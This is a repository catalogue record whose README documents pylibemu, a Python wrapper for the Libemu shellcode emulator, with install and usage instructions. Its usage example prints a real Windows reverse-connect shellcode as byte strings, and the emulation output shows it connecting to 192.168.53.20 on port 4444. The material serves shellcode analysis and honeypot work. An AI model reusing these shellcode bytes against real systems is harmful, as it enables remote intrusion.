{"id":17383761,"url":"https://github.com/buffer/pylibemu","last_synced_at":"2025-04-04T21:10:21.446Z","repository":{"id":44907880,"uuid":"1533917","full_name":"buffer/pylibemu","owner":"buffer","description":"A Libemu Cython wrapper","archived":false,"fork":false,"pushed_at":"2023-11-29T16:43:29.000Z","size":1333,"stargazers_count":126,"open_issues_count":3,"forks_count":29,"subscribers_count":9,"default_branch":"master","last_synced_at":"2025-03-28T20:09:32.947Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/buffer.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2011-03-27T20:10:35.000Z","updated_at":"2025-01-25T02:00:27.000Z","dependencies_parsed_at":"2024-04-15T22:52:47.077Z","dependency_job_id":"8639123d-c201-4fcf-95ab-36a998d922b9","html_url":"https://github.com/buffer/pylibemu","commit_stats":{"total_commits":138,"total_committers":5,"mean_commits":27.6,"dds":0.07971014492753625,"last_synced_commit":"4cec85c15917f62c876f15e9099338584fda6fae"},"previous_names":[],"tags_count":32,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fpylibemu","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fpylibemu/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fpylibemu/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/buffer%2Fpylibemu/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH
ub/owners/buffer","download_url":"https://codeload.github.com/buffer/pylibemu/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247249532,"owners_count":20908212,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-16T07:43:42.205Z","updated_at":"2025-04-04T21:10:21.432Z","avatar_url":"https://github.com/buffer.png","language":"Python","readme":"\nPylibemu  |version badge| |downloads badge|\n============================================================================\n\n.. |version badge| image:: https://img.shields.io/pypi/v/pylibemu.svg\n   :target: https://pypi.python.org/pypi/pylibemu/\n.. |downloads badge| image:: https://img.shields.io/pypi/dm/pylibemu.svg\n   :target: https://pypi.python.org/pypi/pylibemu/\n\nPylibemu is a wrapper for the Libemu library (https://github.com/buffer/libemu).\n\n\nRequirements\n============\n\n- Python 2.5+ or Python 3.6+ (read installation notes)\n- Libemu\n\n\nInstallation (Python 3)\n=======================\n\nPylibemu \u003e 0.5.8 does not include Libemu submodule anymore so you are required to\ninstall Libemu before installing Pylibemu.\n\nTo install Libemu, just execute:\n\n.. code-block:: console\n\n    $ git clone https://github.com/buffer/libemu.git\n    $ cd libemu\n    $ autoreconf -v -i\n    $ ./configure\n    $ make\n    $ sudo make install\n\nOnce Libemu is correctly installed, just execute:\n\n.. 
code-block:: console\n\n    $ sudo pip install pylibemu\n\n\nInstallation (Python 2)\n=======================\n\nPylibemu 0.5.8 is the last version supporting Python 2.\n\nTo install Pylibemu, just execute:\n\n.. code-block:: console\n\n\t$ sudo pip install pylibemu==0.5.8\n\n\nUsage\n=====\n\n.. code-block:: pycon\n\n\t\u003e\u003e\u003e import pylibemu\n\t\u003e\u003e\u003e shellcode  = b\"\\xfc\\x6a\\xeb\\x47\\xe8\\xf9\\xff\\xff\\xff\\x60\\x31\\xdb\\x8b\\x7d\"\n\t\u003e\u003e\u003e shellcode += b\"\\x3c\\x8b\\x7c\\x3d\\x78\\x01\\xef\\x8b\\x57\\x20\\x01\\xea\\x8b\\x34\"\n\t\u003e\u003e\u003e shellcode += b\"\\x9a\\x01\\xee\\x31\\xc0\\x99\\xac\\xc1\\xca\\x0d\\x01\\xc2\\x84\\xc0\"\n\t\u003e\u003e\u003e shellcode += b\"\\x75\\xf6\\x43\\x66\\x39\\xca\\x75\\xe3\\x4b\\x8b\\x4f\\x24\\x01\\xe9\"\n\t\u003e\u003e\u003e shellcode += b\"\\x66\\x8b\\x1c\\x59\\x8b\\x4f\\x1c\\x01\\xe9\\x03\\x2c\\x99\\x89\\x6c\"\n\t\u003e\u003e\u003e shellcode += b\"\\x24\\x1c\\x61\\xff\\xe0\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\"\n\t\u003e\u003e\u003e shellcode += b\"\\x8b\\x70\\x1c\\xad\\x8b\\x68\\x08\\x5e\\x66\\x53\\x66\\x68\\x33\\x32\"\n\t\u003e\u003e\u003e shellcode += b\"\\x68\\x77\\x73\\x32\\x5f\\x54\\x66\\xb9\\x72\\x60\\xff\\xd6\\x95\\x53\"\n\t\u003e\u003e\u003e shellcode += b\"\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\x89\\xe7\\x66\\x81\\xef\\x08\\x02\"\n\t\u003e\u003e\u003e shellcode += b\"\\x57\\x53\\x66\\xb9\\xe7\\xdf\\xff\\xd6\\x66\\xb9\\xa8\\x6f\\xff\\xd6\"\n\t\u003e\u003e\u003e shellcode += b\"\\x97\\x68\\xc0\\xa8\\x35\\x14\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe3\"\n\t\u003e\u003e\u003e shellcode += b\"\\x6a\\x10\\x53\\x57\\x66\\xb9\\x57\\x05\\xff\\xd6\\x50\\xb4\\x0c\\x50\"\n\t\u003e\u003e\u003e shellcode += b\"\\x53\\x57\\x53\\x66\\xb9\\xc0\\x38\\xff\\xe6\"\n\t\u003e\u003e\u003e emulator = pylibemu.Emulator()\n\t\u003e\u003e\u003e offset = emulator.shellcode_getpc_test(shellcode)\n\t\u003e\u003e\u003e offset\n\t4\n\t\u003e\u003e\u003e emulator.prepare(shellcode, 
offset)\n\t\u003e\u003e\u003e emulator.test()\n\t0\n\t\u003e\u003e\u003e print(emulator.emu_profile_output)\n\tHMODULE LoadLibraryA (\n     \tLPCTSTR lpFileName = 0x0012fe90 =\u003e \n           \t= \"ws2_32\";\n\t) = 0x71a10000;\n\tint WSAStartup (\n     \tWORD wVersionRequested = 2;\n     \tLPWSADATA lpWSAData = 1244272;\n\t) =  0;\n\tSOCKET WSASocket (\n     \tint af = 2;\n     \tint type = 1;\n     \tint protocol = 0;\n     \tLPWSAPROTOCOL_INFO lpProtocolInfo = 0;\n     \tGROUP g = 0;\n     \tDWORD dwFlags = 0;\n\t) =  66;\n\tint connect (\n     \tSOCKET s = 66;\n     \tstruct sockaddr_in * name = 0x0012fe88 =\u003e \n         \tstruct   = {\n            \tshort sin_family = 2;\n             \tunsigned short sin_port = 23569 (port=4444);\n             \tstruct in_addr sin_addr = {\n                unsigned long s_addr = 339060928 (host=192.168.53.20);\n             };\n             char sin_zero = \"       \";\n         };\n     \tint namelen = 16;\n\t) =  0;\n\tint recv (\n     \tSOCKET s = 66;\n     \tchar * buf = 0x0012fe88 =\u003e \n        \t none;\n     \tint len = 3072;\n     \tint flags = 0;\n\t) =  3072;\n\n\t\u003e\u003e\u003e emulator.emu_profile_truncated\n\tFalse\n\n\nThe Emulator method ``run``, introduced in Pylibemu 0.1.3, performs the same steps in a single call so you \ndo not need to worry about the details. The Emulator attribute ``offset`` still exposes the detected \noffset if needed.\n\n.. code-block:: pycon\n\n\t\u003e\u003e\u003e emulator = pylibemu.Emulator()\n\t\u003e\u003e\u003e emulator.run(shellcode)\n\t0\n\t\u003e\u003e\u003e emulator.offset\n\t4\n\t\u003e\u003e\u003e print(emulator.emu_profile_output)\n\tHMODULE LoadLibraryA (\n    \t LPCTSTR = 0x01a3f990 =\u003e \n           \t= \"ws2_32\";\n\t) =  1906376704;\n\tint WSAStartup (\n     \tWORD wVersionRequested = 2;\n     \tLPWSADATA lpWSAData = 1244272;\n\t) =  0;\n\tSOCKET WSASocket (\n     \tint af = 2;\n     \tint type = 1;\n     \tint protocol = 0;\n     \tLPWSAPROTOCOL_INFO lpProtocolInfo = 0;\n     \tGROUP g = 0;\n     \tDWORD dwFlags = 0;\n\t) =  66;\n\tint connect (\n     \tSOCKET s = 66;\n     \tstruct sockaddr_in * name = 0x0012fe88 =\u003e \n        \tstruct   = {\n            \tshort sin_family = 2;\n             \tunsigned short sin_port = 23569 (port=4444);\n             \tstruct in_addr sin_addr = {\n                unsigned long s_addr = 339060928 (host=192.168.53.20);\n             };\n             char sin_zero = \"       \";\n         };\n     int namelen = 16;\n\t) =  0;\n\tint recv (\n     \tSOCKET s = 66;\n     \tchar * = 0x01a40870 =\u003e \n         \tnone;\n     \tint len = 3072;\n     \tint flags = 0;\n\t) =  3072;\n\n\t\u003e\u003e\u003e emulator.emu_profile_truncated\n\tFalse\n\n\nThe Emulator accepts the optional parameter ``output_size`` which defines how much memory \nwill be reserved for storing the emulation profile dump. By default, its size is 1MB but \nit can be changed in two ways:\n\n.. code-block:: pycon\n\n\t\u003e\u003e\u003e emulator = pylibemu.Emulator(1024)\n\n\t\u003e\u003e\u003e emulator = pylibemu.Emulator()\n\t\u003e\u003e\u003e emulator.set_output_size(1024)\n\nIf the reserved memory is not enough to contain the entire dump, the dump will be truncated \nand the Emulator attribute ``emu_profile_truncated`` will be set to True. This approach is \nneeded in order not to penalize performance while analyzing shellcodes which may produce \ndumps of several MB (such as the Metasploit windows/download_exec payload). If the entire dump is needed, \na simple approach is to check the ``emu_profile_truncated`` attribute after the \nshellcode emulation test, increase the reserved memory through the Emulator ``set_output_size`` \nmethod and then run the shellcode emulation test again as shown above.\n\n\nLicense information\n===================\n\nCopyright (C) 2011-2023 Angelo Dell'Aera \u003cbuffer@antifork.org\u003e\n\nLicense: GNU General Public License, version 2\n","funding_links":[],"categories":["Network and Artifact Analysis","\u003ca name=\"honeypots\"\u003e\u003c/a\u003e Honeypots"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbuffer%2Fpylibemu","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbuffer%2Fpylibemu","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbuffer%2Fpylibemu/lists"}